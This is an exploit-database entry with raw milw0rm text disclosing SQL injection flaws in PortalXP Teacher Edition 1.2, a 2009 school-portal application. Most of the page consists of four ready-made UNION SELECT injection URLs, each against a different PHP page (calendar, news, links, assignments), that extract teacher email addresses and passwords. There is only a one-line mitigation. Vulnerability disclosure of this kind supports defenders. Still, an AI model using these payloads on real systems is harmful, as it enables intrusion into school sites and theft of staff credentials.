PortalXP - Teacher Edition 1.2 Multiple SQL Injection Vulnerabilities

vendor:

PortalXP - Teacher Edition

by:

SirGod

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: PortalXP - Teacher Edition

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:portalxp:portalxp_-_teacher_edition:1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PortalXP – Teacher Edition 1.2 Multiple SQL Injection Vulnerabilities

PortalXP - Teacher Edition 1.2 is vulnerable to multiple SQL Injection vulnerabilities. An attacker can exploit these vulnerabilities to gain access to sensitive information such as usernames and passwords. The PoC's for these vulnerabilities are: http://127.0.0.1/calendar.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--, http://127.0.0.1/news.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--, http://127.0.0.1/links.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--, http://127.0.0.1/assignments.php?assignment_id=1+union+all+select+1,2,3,4,concat_ws(0x3a,email,teacherpass),6,7,8,9+from+teacher--

Mitigation:

Apply the latest security patches and ensure that all web applications are up to date.

Source

Exploit-DB raw data:

###########################################################################################################################################
[+] PortalXP - Teacher Edition 1.2 Multiple SQL Injection Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
###########################################################################################################################################

[+] Download : http://sourceforge.net/projects/portalxp/files/portalxp%20-%20teacher%20edition/Version%201.2/PortalXP1-2.zip/download

[+] SQL Injection

 - PoC's

   http://127.0.0.1/calendar.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--

   http://127.0.0.1/news.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--

   http://127.0.0.1/links.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--

   http://127.0.0.1/assignments.php?assignment_id=1+union+all+select+1,2,3,4,concat_ws(0x3a,email,teacherpass),6,7,8,9+from+teacher--


###########################################################################################################################################

# milw0rm.com [2009-08-01]